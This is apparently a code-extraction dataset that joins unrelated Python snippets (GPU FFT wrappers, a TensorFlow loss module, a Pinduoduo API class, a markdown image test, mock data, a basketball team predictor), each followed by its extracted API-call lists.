new_player_list = playerSwap.recommendPlayer(player_list, potential_swaps, return_new_team_list=True)
prediction = predictWinPercentage.predictWinPercentage(pd_sr, sa_data, new_player_list, season)
print(prediction)
if response == 'no':
print('Sounds good, peace out!')
exit()
|
[
"functions.playerSwap.teamAssessment",
"functions.playerSwap.salaryCap",
"functions.playerSwap.recommendPlayer",
"os.getcwd",
"pandas.read_csv",
"functions.playerSwap.assessPlayerSwaps",
"functions.predictWinPercentage.predictWinPercentage",
"functions.playerSwap.getZScores"
] |
[((488, 499), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (497, 499), False, 'import os\n'), ((537, 580), 'pandas.read_csv', 'pd.read_csv', (["(path + '/data/player_data.csv')"], {}), "(path + '/data/player_data.csv')\n", (548, 580), True, 'import pandas as pd\n'), ((607, 664), 'pandas.read_csv', 'pd.read_csv', (["(path + '/data/player_data_single_record.csv')"], {}), "(path + '/data/player_data_single_record.csv')\n", (618, 664), True, 'import pandas as pd\n'), ((687, 751), 'pandas.read_csv', 'pd.read_csv', (["(path + '/data/season_average_data.csv')"], {'index_col': '(0)'}), "(path + '/data/season_average_data.csv', index_col=0)\n", (698, 751), True, 'import pandas as pd\n'), ((766, 811), 'pandas.read_csv', 'pd.read_csv', (["(path + '/data/salaries_2017.csv')"], {}), "(path + '/data/salaries_2017.csv')\n", (777, 811), True, 'import pandas as pd\n'), ((1091, 1194), 'functions.predictWinPercentage.predictWinPercentage', 'predictWinPercentage.predictWinPercentage', (['player_data_sr', 'season_average_data', 'player_list', 'season'], {}), '(player_data_sr,\n season_average_data, player_list, season)\n', (1132, 1194), True, 'import functions.predictWinPercentage as predictWinPercentage\n'), ((1250, 1301), 'functions.playerSwap.salaryCap', 'playerSwap.salaryCap', (['player_list', 'salary_data', '(0.8)'], {}), '(player_list, salary_data, 0.8)\n', (1270, 1301), True, 'import functions.playerSwap as playerSwap\n'), ((1857, 1907), 'functions.playerSwap.getZScores', 'playerSwap.getZScores', (['player_list', 'pd_sr', 'sa_data'], {}), '(player_list, pd_sr, sa_data)\n', (1878, 1907), True, 'import functions.playerSwap as playerSwap\n'), ((1918, 1952), 'functions.playerSwap.teamAssessment', 'playerSwap.teamAssessment', (['z_score'], {}), '(z_score)\n', (1943, 1952), True, 'import functions.playerSwap as playerSwap\n'), ((2340, 2416), 'functions.playerSwap.assessPlayerSwaps', 'playerSwap.assessPlayerSwaps', (['player_list', 'pd_sr', 'sa_data', 'salary_data', '(True)'], {}), '(player_list, pd_sr, sa_data, salary_data, True)\n', (2368, 2416), True, 'import functions.playerSwap as playerSwap\n'), ((2428, 2484), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {}), '(player_list, potential_swaps)\n', (2454, 2484), True, 'import functions.playerSwap as playerSwap\n'), ((2512, 2589), 'functions.playerSwap.assessPlayerSwaps', 'playerSwap.assessPlayerSwaps', (['player_list', 'pd_sr', 'sa_data', 'salary_data', '(False)'], {}), '(player_list, pd_sr, sa_data, salary_data, False)\n', (2540, 2589), True, 'import functions.playerSwap as playerSwap\n'), ((2601, 2657), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {}), '(player_list, potential_swaps)\n', (2627, 2657), True, 'import functions.playerSwap as playerSwap\n'), ((2836, 2923), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {'return_new_team_list': '(True)'}), '(player_list, potential_swaps,\n return_new_team_list=True)\n', (2862, 2923), True, 'import functions.playerSwap as playerSwap\n'), ((2935, 3021), 'functions.predictWinPercentage.predictWinPercentage', 'predictWinPercentage.predictWinPercentage', (['pd_sr', 'sa_data', 'new_player_list', 'season'], {}), '(pd_sr, sa_data, new_player_list,\n season)\n', (2976, 3021), True, 'import functions.predictWinPercentage as predictWinPercentage\n'), ((3082, 3158), 'functions.playerSwap.assessPlayerSwaps', 'playerSwap.assessPlayerSwaps', (['player_list', 'pd_sr', 'sa_data', 'salary_data', '(True)'], {}), '(player_list, pd_sr, sa_data, salary_data, True)\n', (3110, 3158), True, 'import functions.playerSwap as playerSwap\n'), ((3169, 3225), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {}), '(player_list, potential_swaps)\n', (3195, 3225), True, 'import functions.playerSwap as playerSwap\n'), ((3403, 3490), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {'return_new_team_list': '(True)'}), '(player_list, potential_swaps,\n return_new_team_list=True)\n', (3429, 3490), True, 'import functions.playerSwap as playerSwap\n'), ((3502, 3588), 'functions.predictWinPercentage.predictWinPercentage', 'predictWinPercentage.predictWinPercentage', (['pd_sr', 'sa_data', 'new_player_list', 'season'], {}), '(pd_sr, sa_data, new_player_list,\n season)\n', (3543, 3588), True, 'import functions.predictWinPercentage as predictWinPercentage\n')]
|
from __future__ import annotations
from typing import TYPE_CHECKING, Union
from warnings import filterwarnings
import pyopencl as cl
import pyopencl.array as cla
import numpy as np
from gpyfft.fft import FFT
from ._util import get_context
filterwarnings("ignore", module="pyopencl")
if TYPE_CHECKING:
from reikna.cluda.cuda import Array as cudaArray
from reikna.cluda.ocl import Array as oclArray
Array = Union[cudaArray, oclArray]
context = get_context()
queue = cl.CommandQueue(context)
# plan cache
_PLAN_CACHE = {}
def _normalize_axes(dshape, axes):
"""Convert possibly negative axes to positive axes."""
if axes is None:
return None
_axes = [axes] if np.isscalar(axes) else list(axes)
try:
return tuple(np.arange(len(dshape))[_axes])
except Exception as e:
raise TypeError(f"Cannot normalize axes {axes}: {e}")
def _get_fft_plan(arr, axes=None, fast_math=False):
"""Cache and return a reikna FFT plan suitable for `arr` type and shape."""
axes = _normalize_axes(arr.shape, axes)
plan_key = (arr.shape, arr.dtype, axes, fast_math)
if plan_key not in _PLAN_CACHE:
_PLAN_CACHE[plan_key] = FFT(context, queue, arr, axes=axes, fast_math=fast_math)
return _PLAN_CACHE[plan_key]
def _fftn(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, ...] | None = None,
inplace: bool = False,
fast_math: bool = True,
*,
_inverse: bool = False,
) -> Array:
"""Perform fast Fourier transformation on `input_array`.
Parameters
----------
input_arr : numpy or OCL array
A numpy or OCL array to transform. If an OCL array is provided, it must already
be of type `complex64`. If a numpy array is provided, it will be converted
to `float32` before the transformation is performed.
output_arr : numpy or OCL array, optional
An optional array/buffer to use for output, by default None
axes : tuple of int, optional
T tuple with axes over which to perform the transform.
If not given, the transform is performed over all the axes., by default None
inplace : bool, optional
Whether to place output data in the `input_arr` buffer, by default False
fast_math : bool, optional
Whether to enable fast (less precise) mathematical operations during
compilation, by default True
_inverse : bool, optional
Perform inverse FFT, by default False. (prefer using `ifftn`)
Returns
-------
OCLArray
result of transformation (still on GPU). Use `.get()` or `cle.pull`
to retrieve from GPU.
If `inplace` or `output_arr` where used, data will also be placed in
the corresponding buffer as a side effect.
Raises
------
TypeError
If OCL array is provided that is not of type complex64. Or if an unrecognized
array is provided.
ValueError
If inplace is used for numpy array, or both `output_arr` and `inplace` are used.
"""
if output_arr is not None and inplace:
raise ValueError("`output_arr` cannot be provided if `inplace` is True")
assert input_arr.dtype in (np.float32, np.float64, np.complex64, np.complex128)
if not np.iscomplexobj(input_arr):
input_arr = input_arr.astype(np.complex64) # TODO
_input_array = (
cla.to_device(queue, input_arr)
if isinstance(input_arr, np.ndarray)
else input_arr
)
transform = _get_fft_plan(_input_array, axes=axes, fast_math=fast_math)
if not inplace:
if output_arr is None:
output_arr = cla.empty_like(_input_array)
transform.result = output_arr
(event,) = transform.enqueue(forward=not _inverse)
event.wait()
if not inplace:
return output_arr
return _input_array
def fft(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: int = -1,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return fftn(input_arr, output_arr, (axes,), inplace, fast_math)
def ifft(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: int = -1,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return ifftn(input_arr, output_arr, (axes,), inplace, fast_math)
def fft2(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, int] = (-2, -1),
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return fftn(input_arr, output_arr, axes, inplace, fast_math)
def ifft2(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, int] = (-2, -1),
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return ifftn(input_arr, output_arr, axes, inplace, fast_math)
def fftn(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, ...] | None = None,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return _fftn(input_arr, output_arr, axes, inplace, fast_math)
def ifftn(
input_arr,
output_arr=None,
axes=None,
inplace=False,
fast_math=True,
):
return _fftn(input_arr, output_arr, axes, inplace, fast_math, _inverse=True)
def rfft(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: int = -1,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
x = _fftn(input_arr, output_arr, (axes,), inplace, fast_math)
return x[:, : input_arr.shape[-1] // 2 + 1]
# FIXME
# def irfft(
# input_arr: np.ndarray | Array,
# output_arr: np.ndarray | Array = None,
# axes: int = -1,
# inplace: bool = False,
# fast_math: bool = True,
# ) -> Array:
# x = _fftn(input_arr, output_arr, axes, inplace, fast_math, _inverse=True)
# shp = list(input_arr.shape)
# n = shp[axes]
# shp[axes] = 2 * n - 2
# result = empty(shp, np.float32)
# result[..., :n] = x.real
# result[..., n - 1 :] = x.real[..., 1:][::-1]
# return result.astype(np.float64)
def rfft2(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, int] = (-2, -1),
inplace: bool = False,
fast_math: bool = True,
) -> Array:
x = _fftn(input_arr, output_arr, axes, inplace, fast_math)
return x[:, : input_arr.shape[1] // 2 + 1]
# FIXME
# def irfft2(
# input_arr: np.ndarray | Array,
# output_arr: np.ndarray | Array = None,
# axes: Tuple[int, int] = (-2, -1),
# inplace: bool = False,
# fast_math: bool = True,
# ) -> Array:
# x = _fftn(input_arr, output_arr, axes, inplace, fast_math)
# return x[:, : input_arr.shape[1] // 2 + 1]
def rfftn(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, ...] | None = None,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
x = _fftn(input_arr, output_arr, axes, inplace, fast_math)
return x[:, : input_arr.shape[1] // 2 + 1]
# FIXME
# def irfftn(
# input_arr: np.ndarray | Array,
# output_arr: np.ndarray | Array = None,
# axes: tuple[int, ...] | None = None,
# inplace: bool = False,
# fast_math: bool = True,
# ) -> Array:
# x = _fftn(input_arr, output_arr, axes, inplace, fast_math)
# return x[..., : input_arr.shape[1] // 2 + 1]
|
[
"pyopencl.array.empty_like",
"gpyfft.fft.FFT",
"numpy.iscomplexobj",
"warnings.filterwarnings",
"numpy.isscalar",
"pyopencl.CommandQueue",
"pyopencl.array.to_device"
] |
[((244, 287), 'warnings.filterwarnings', 'filterwarnings', (['"""ignore"""'], {'module': '"""pyopencl"""'}), "('ignore', module='pyopencl')\n", (258, 287), False, 'from warnings import filterwarnings\n'), ((485, 509), 'pyopencl.CommandQueue', 'cl.CommandQueue', (['context'], {}), '(context)\n', (500, 509), True, 'import pyopencl as cl\n'), ((701, 718), 'numpy.isscalar', 'np.isscalar', (['axes'], {}), '(axes)\n', (712, 718), True, 'import numpy as np\n'), ((1187, 1243), 'gpyfft.fft.FFT', 'FFT', (['context', 'queue', 'arr'], {'axes': 'axes', 'fast_math': 'fast_math'}), '(context, queue, arr, axes=axes, fast_math=fast_math)\n', (1190, 1243), False, 'from gpyfft.fft import FFT\n'), ((3281, 3307), 'numpy.iscomplexobj', 'np.iscomplexobj', (['input_arr'], {}), '(input_arr)\n', (3296, 3307), True, 'import numpy as np\n'), ((3398, 3429), 'pyopencl.array.to_device', 'cla.to_device', (['queue', 'input_arr'], {}), '(queue, input_arr)\n', (3411, 3429), True, 'import pyopencl.array as cla\n'), ((3657, 3685), 'pyopencl.array.empty_like', 'cla.empty_like', (['_input_array'], {}), '(_input_array)\n', (3671, 3685), True, 'import pyopencl.array as cla\n')]
|
# -*- coding: utf-8 -*-
"""
DdkRpPromUrlGenerate.py:
https://open.pinduoduo.com/application/document/api?id=pdd.ddk.rp.prom.url.generate
生成营销工具推广链接
"""
from pdd_sdk.api.base import RestApi
class DdkRpPromUrlGenerate(RestApi):
def __init__(self, domain='gw-api.pinduoduo.com', port=80):
RestApi.__init__(self, domain, port)
self.amount = None # 初始金额(单位分),有效金额枚举值:300、500、700、1100和1600,默认300
# -1-活动列表,0-默认红包,2–新人红包,3-刮刮卡,5-员工内购,6-购物车,7-大促会场,8-直播间列表集合页,10-生成绑定备案链接,11-生成超级红包(仅支持微信小程序),12-砸金蛋
self.channel_type = None
self.custom_parameters = None # 自定义参数,为链接打上自定义标签。自定义参数最长限制64个字节。
self.diy_lottery_param = None # 转盘自定义参数
self.range_items = None # 自定义价格和商品佣金区间
self.diy_red_packet_param = None # 红包自定义参数
self.generate_qq_app = None # 是否生成qq小程序
self.generate_schema_url = None # 是否返回 schema URL
self.generate_short_url = None # 是否生成短链接,true-是,false-否
self.generate_we_app = None # 是否生成小程序推广
self.p_id_list = None # 推广位列表,例如:["60005_612"]
def getapiname(self):
return 'pdd.ddk.rp.prom.url.generate'
|
[
"pdd_sdk.api.base.RestApi.__init__"
] |
[((302, 338), 'pdd_sdk.api.base.RestApi.__init__', 'RestApi.__init__', (['self', 'domain', 'port'], {}), '(self, domain, port)\n', (318, 338), False, 'from pdd_sdk.api.base import RestApi\n')]
|
"""Test module of the images."""
import unittest
from books import Books
import fnmatch
import os
import re
import sys
class TestImages(unittest.TestCase):
"""Unit test of the images."""
def test_images_are_valid(self):
"""Test that the MD files refer to valid URLs."""
books = Books()
for book in books.books:
for md_path in book.md_paths:
args = {} if sys.version_info[0] < 3 else {'encoding': 'utf-8'}
with open(md_path, **args) as f:
content = f.read()
for match in re.finditer(r"!\[(.*?)\]\((.*?)\)", content):
# remove parameters
is_youtube_video = match.group(1) == "youtube video"
image_ref = match.group(2).split(' ')[0]
if not is_youtube_video and not image_ref.startswith('http'):
image_path = os.path.join(book.path, image_ref)
self.assertTrue(
os.path.isfile(image_path),
msg='%s: "%s" not found' % (md_path, image_path)
)
def test_all_images_are_used(self):
"""Test that all the image files are referenced somewhere."""
books = Books()
for book in books.books:
# search for all images
images_paths = [] # ['image/sonar.png', 'image/sphere.png', ...]
for root, dirnames, filenames in os.walk(book.path):
if 'scenes' in root.replace(books.project_path, ''):
continue
for filename in fnmatch.filter(filenames, '*.png') + fnmatch.filter(filenames, '*.jpg'):
image_path = os.path.join(root, filename)
image_path = image_path[(len(book.path) + 1):]
images_paths.append(image_path.replace('\\', '/'))
self.assertGreater(
len(images_paths), 0,
msg='No image found in book "%s"' % book.name
)
# check the image reference can be found in at least one MD file
for image_path in images_paths:
found = False
for md_path in book.md_paths:
args = {} if sys.version_info[0] < 3 else {'encoding': 'utf-8'}
with open(md_path, **args) as file:
if (image_path in file.read() or
image_path.replace('.png', '.thumbnail.jpg') in images_paths or
image_path.replace('.png', '.thumbnail.png') in images_paths):
found = True
break
self.assertTrue(
found, msg='Image "%s" not referenced in any MD file.' % image_path
)
# in case of thumbnail make sure the original file is available
if image_path.endswith('.thumbnail.jpg'):
self.assertTrue(
image_path.replace('.thumbnail.jpg', '.png') in images_paths,
msg='Missing original file for thumbnail "%s".' % image_path
)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"fnmatch.filter",
"re.finditer",
"os.walk",
"os.path.isfile",
"books.Books",
"os.path.join"
] |
[((3257, 3272), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3270, 3272), False, 'import unittest\n'), ((306, 313), 'books.Books', 'Books', ([], {}), '()\n', (311, 313), False, 'from books import Books\n'), ((1287, 1294), 'books.Books', 'Books', ([], {}), '()\n', (1292, 1294), False, 'from books import Books\n'), ((1487, 1505), 'os.walk', 'os.walk', (['book.path'], {}), '(book.path)\n', (1494, 1505), False, 'import os\n'), ((586, 633), 're.finditer', 're.finditer', (['"""!\\\\[(.*?)\\\\]\\\\((.*?)\\\\)"""', 'content'], {}), "('!\\\\[(.*?)\\\\]\\\\((.*?)\\\\)', content)\n", (597, 633), False, 'import re\n'), ((1637, 1671), 'fnmatch.filter', 'fnmatch.filter', (['filenames', '"""*.png"""'], {}), "(filenames, '*.png')\n", (1651, 1671), False, 'import fnmatch\n'), ((1674, 1708), 'fnmatch.filter', 'fnmatch.filter', (['filenames', '"""*.jpg"""'], {}), "(filenames, '*.jpg')\n", (1688, 1708), False, 'import fnmatch\n'), ((1743, 1771), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (1755, 1771), False, 'import os\n'), ((925, 959), 'os.path.join', 'os.path.join', (['book.path', 'image_ref'], {}), '(book.path, image_ref)\n', (937, 959), False, 'import os\n'), ((1029, 1055), 'os.path.isfile', 'os.path.isfile', (['image_path'], {}), '(image_path)\n', (1043, 1055), False, 'import os\n')]
|
#!/usr/bin/env python3
"""
mock.py - Seperate mock util functions
"""
from random import randint
def generate_issue_id():
return randint(10000, 999999)
users = {
'<EMAIL>': {'email': '<EMAIL>', 'password': '<PASSWORD>', 'type': 'trainstaff'},
'<EMAIL>': {'email': '<EMAIL>', 'password': '<PASSWORD>', 'type': 'trainstaff'},
'<EMAIL>': {'email': '<EMAIL>', 'password': '<PASSWORD>', 'type': 'stationstaff'},
'<EMAIL>': {'email': '<EMAIL>', 'password': '<PASSWORD>', 'type': 'stationstaff'}
}
dialogs = {
"hi": "Hello!",
"how are you?": "Fine and you",
"fine": "Then have a good trip"
}
queries = {
'node1': [
{
"issue_id": 12345,
"resolved": 0,
"title": "why so noisy?",
"created_by": "user_socket_id1",
"priority": 1,
"nearest_station": "station1",
"nearest_staff_id": "<EMAIL>",
"category": "question",
"extra_data": {}
},
{
"issue_id": 12346,
"resolved": 0,
"title": "lost child",
"created_by": "user_socket_id2",
"priority": 5,
"nearest_station": "station1",
"nearest_staff_id": "<EMAIL>",
"category": "lost",
"extra_data": {}
}
]
}
|
[
"random.randint"
] |
[((136, 158), 'random.randint', 'randint', (['(10000)', '(999999)'], {}), '(10000, 999999)\n', (143, 158), False, 'from random import randint\n')]
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""losses.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow.contrib import metrics as contrib_metrics
def margin_loss(labels, raw_logits, margin=0.4, downweight=0.5):
print('margin loss')
logits = raw_logits - 0.5
positive_cost = labels * tf.cast(tf.less(logits, margin),
tf.float32) * tf.pow(logits - margin, 2)
negative_cost = (1 - labels) * tf.cast(
tf.greater(logits, -margin), tf.float32) * tf.pow(logits + margin, 2)
return 0.5 * positive_cost + downweight * 0.5 * negative_cost
def order_loss(labels, logits, margin=0.2):
label_act = tf.reduce_sum(labels * logits, axis=-1, keep_dims=True)
negative_cost = (1 - labels) * tf.cast(
tf.greater(logits, label_act - margin), tf.float32) * tf.pow(
logits + margin - label_act, 2)
return negative_cost
def optimizer(logits, labels, multi, scope, softmax, rate=1.0, step=0.0):
"""Calculate loss and metrics."""
with tf.name_scope('loss'):
if softmax:
diff = tf.nn.softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
else:
margin = 0.2 + .79 * tf.sigmoid(tf.minimum(10.0, step / 50000.0 - 4))
print('why softmax is on?!')
diff = order_loss(labels=labels, logits=logits, margin=margin)
print('what changed then?!')
# diff = margin_loss(labels=labels, raw_logits=logits)
with tf.name_scope('total'):
cross_entropy = tf.reduce_mean(diff)
tf.add_to_collection('losses', rate * cross_entropy)
tf.summary.scalar('batch_cross_entropy', cross_entropy)
# cross entropy plus all of the regularizers.
losses = tf.add_n(tf.get_collection('losses', scope), name='total_loss')
tf.summary.scalar('total_loss', losses)
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
_, classes = tf.nn.top_k(labels, k=2 if multi else 1)
_, preds = tf.nn.top_k(logits, k=2 if multi else 1)
wrong = contrib_metrics.set_size(
contrib_metrics.set_difference(classes, preds))
correct_prediction = tf.equal(wrong, 0)
almost_correct = tf.less(wrong, 2)
correct_prediction_sum = tf.reduce_sum(
tf.cast(correct_prediction, tf.float32))
almost_correct_sum = tf.reduce_sum(tf.cast(almost_correct, tf.float32))
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
tf.summary.scalar('correct_prediction_batch', correct_prediction_sum)
tf.summary.scalar('almost_correct_batch', almost_correct_sum)
return losses, correct_prediction_sum, almost_correct_sum
|
[
"tensorflow.compat.v1.cast",
"tensorflow.compat.v1.equal",
"tensorflow.compat.v1.name_scope",
"tensorflow.compat.v1.reduce_mean",
"tensorflow.compat.v1.nn.top_k",
"tensorflow.compat.v1.minimum",
"tensorflow.compat.v1.pow",
"tensorflow.compat.v1.add_to_collection",
"tensorflow.compat.v1.get_collection",
"tensorflow.compat.v1.nn.softmax_cross_entropy_with_logits",
"tensorflow.compat.v1.less",
"tensorflow.compat.v1.reduce_sum",
"tensorflow.compat.v1.greater",
"tensorflow.contrib.metrics.set_difference",
"tensorflow.compat.v1.summary.scalar"
] |
[((1321, 1376), 'tensorflow.compat.v1.reduce_sum', 'tf.reduce_sum', (['(labels * logits)'], {'axis': '(-1)', 'keep_dims': '(True)'}), '(labels * logits, axis=-1, keep_dims=True)\n', (1334, 1376), True, 'import tensorflow.compat.v1 as tf\n'), ((2229, 2284), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""batch_cross_entropy"""', 'cross_entropy'], {}), "('batch_cross_entropy', cross_entropy)\n", (2246, 2284), True, 'import tensorflow.compat.v1 as tf\n'), ((2411, 2450), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""total_loss"""', 'losses'], {}), "('total_loss', losses)\n", (2428, 2450), True, 'import tensorflow.compat.v1 as tf\n'), ((3121, 3160), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""accuracy"""', 'accuracy'], {}), "('accuracy', accuracy)\n", (3138, 3160), True, 'import tensorflow.compat.v1 as tf\n'), ((3163, 3232), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""correct_prediction_batch"""', 'correct_prediction_sum'], {}), "('correct_prediction_batch', correct_prediction_sum)\n", (3180, 3232), True, 'import tensorflow.compat.v1 as tf\n'), ((3235, 3296), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""almost_correct_batch"""', 'almost_correct_sum'], {}), "('almost_correct_batch', almost_correct_sum)\n", (3252, 3296), True, 'import tensorflow.compat.v1 as tf\n'), ((1052, 1078), 'tensorflow.compat.v1.pow', 'tf.pow', (['(logits - margin)', '(2)'], {}), '(logits - margin, 2)\n', (1058, 1078), True, 'import tensorflow.compat.v1 as tf\n'), ((1170, 1196), 'tensorflow.compat.v1.pow', 'tf.pow', (['(logits + margin)', '(2)'], {}), '(logits + margin, 2)\n', (1176, 1196), True, 'import tensorflow.compat.v1 as tf\n'), ((1479, 1517), 'tensorflow.compat.v1.pow', 'tf.pow', (['(logits + margin - label_act)', '(2)'], {}), '(logits + margin - label_act, 2)\n', (1485, 1517), True, 'import tensorflow.compat.v1 as tf\n'), ((1671, 1692), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""loss"""'], {}), "('loss')\n", (1684, 1692), True, 'import tensorflow.compat.v1 as tf\n'), ((2354, 2388), 'tensorflow.compat.v1.get_collection', 'tf.get_collection', (['"""losses"""', 'scope'], {}), "('losses', scope)\n", (2371, 2388), True, 'import tensorflow.compat.v1 as tf\n'), ((2459, 2484), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (2472, 2484), True, 'import tensorflow.compat.v1 as tf\n'), ((1723, 1792), 'tensorflow.compat.v1.nn.softmax_cross_entropy_with_logits', 'tf.nn.softmax_cross_entropy_with_logits', ([], {'labels': 'labels', 'logits': 'logits'}), '(labels=labels, logits=logits)\n', (1762, 1792), True, 'import tensorflow.compat.v1 as tf\n'), ((2101, 2123), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""total"""'], {}), "('total')\n", (2114, 2123), True, 'import tensorflow.compat.v1 as tf\n'), ((2147, 2167), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (['diff'], {}), '(diff)\n', (2161, 2167), True, 'import tensorflow.compat.v1 as tf\n'), ((2174, 2226), 'tensorflow.compat.v1.add_to_collection', 'tf.add_to_collection', (['"""losses"""', '(rate * cross_entropy)'], {}), "('losses', rate * cross_entropy)\n", (2194, 2226), True, 'import tensorflow.compat.v1 as tf\n'), ((2495, 2530), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""correct_prediction"""'], {}), "('correct_prediction')\n", (2508, 2530), True, 'import tensorflow.compat.v1 as tf\n'), ((2551, 2591), 'tensorflow.compat.v1.nn.top_k', 'tf.nn.top_k', (['labels'], {'k': '(2 if multi else 1)'}), '(labels, k=2 if multi else 1)\n', (2562, 2591), True, 'import tensorflow.compat.v1 as tf\n'), ((2609, 2649), 'tensorflow.compat.v1.nn.top_k', 'tf.nn.top_k', (['logits'], {'k': '(2 if multi else 1)'}), '(logits, k=2 if multi else 1)\n', (2620, 2649), True, 'import tensorflow.compat.v1 as tf\n'), ((2775, 2793), 'tensorflow.compat.v1.equal', 'tf.equal', (['wrong', '(0)'], {}), '(wrong, 0)\n', (2783, 2793), True, 'import tensorflow.compat.v1 as tf\n'), ((2817, 2834), 'tensorflow.compat.v1.less', 'tf.less', (['wrong', '(2)'], {}), '(wrong, 2)\n', (2824, 2834), True, 'import tensorflow.compat.v1 as tf\n'), ((3019, 3044), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (3032, 3044), True, 'import tensorflow.compat.v1 as tf\n'), ((978, 1001), 'tensorflow.compat.v1.less', 'tf.less', (['logits', 'margin'], {}), '(logits, margin)\n', (985, 1001), True, 'import tensorflow.compat.v1 as tf\n'), ((1127, 1154), 'tensorflow.compat.v1.greater', 'tf.greater', (['logits', '(-margin)'], {}), '(logits, -margin)\n', (1137, 1154), True, 'import tensorflow.compat.v1 as tf\n'), ((1425, 1463), 'tensorflow.compat.v1.greater', 'tf.greater', (['logits', '(label_act - margin)'], {}), '(logits, label_act - margin)\n', (1435, 1463), True, 'import tensorflow.compat.v1 as tf\n'), ((2700, 2746), 'tensorflow.contrib.metrics.set_difference', 'contrib_metrics.set_difference', (['classes', 'preds'], {}), '(classes, preds)\n', (2730, 2746), True, 'from tensorflow.contrib import metrics as contrib_metrics\n'), ((2891, 2930), 'tensorflow.compat.v1.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (2898, 2930), True, 'import tensorflow.compat.v1 as tf\n'), ((2973, 3008), 'tensorflow.compat.v1.cast', 'tf.cast', (['almost_correct', 'tf.float32'], {}), '(almost_correct, tf.float32)\n', (2980, 3008), True, 'import tensorflow.compat.v1 as tf\n'), ((3078, 3117), 'tensorflow.compat.v1.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (3085, 3117), True, 'import tensorflow.compat.v1 as tf\n'), ((1852, 1888), 'tensorflow.compat.v1.minimum', 'tf.minimum', (['(10.0)', '(step / 50000.0 - 4)'], {}), '(10.0, step / 50000.0 - 4)\n', (1862, 1888), True, 'import tensorflow.compat.v1 as tf\n')]
|
import enum
from InternalNode import InternalNode
from LeafNode import LeafNode
from NodeTag import NodeTag
class TreeHash:
class HashKeyDefinitions(enum.Enum):
PerTGroup = 0
hashKeyDefinition = HashKeyDefinitions.PerTGroup
@staticmethod
def hash(tree):
if TreeHash.hashKeyDefinition == TreeHash.HashKeyDefinitions.PerTGroup:
if NodeTag.isT(tree.root.nodeTag):
left = compactF(tree.root.leftNode())
right = compactF(tree.root.rightNode())
compactTree.root = InternalNode(left, right, compactTree)
|
[
"InternalNode.InternalNode",
"NodeTag.NodeTag.isT"
] |
[((382, 412), 'NodeTag.NodeTag.isT', 'NodeTag.isT', (['tree.root.nodeTag'], {}), '(tree.root.nodeTag)\n', (393, 412), False, 'from NodeTag import NodeTag\n'), ((559, 597), 'InternalNode.InternalNode', 'InternalNode', (['left', 'right', 'compactTree'], {}), '(left, right, compactTree)\n', (571, 597), False, 'from InternalNode import InternalNode\n')]
|
# Copyright 2017 Google Inc. All Rights Reserved.
# Modifications copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
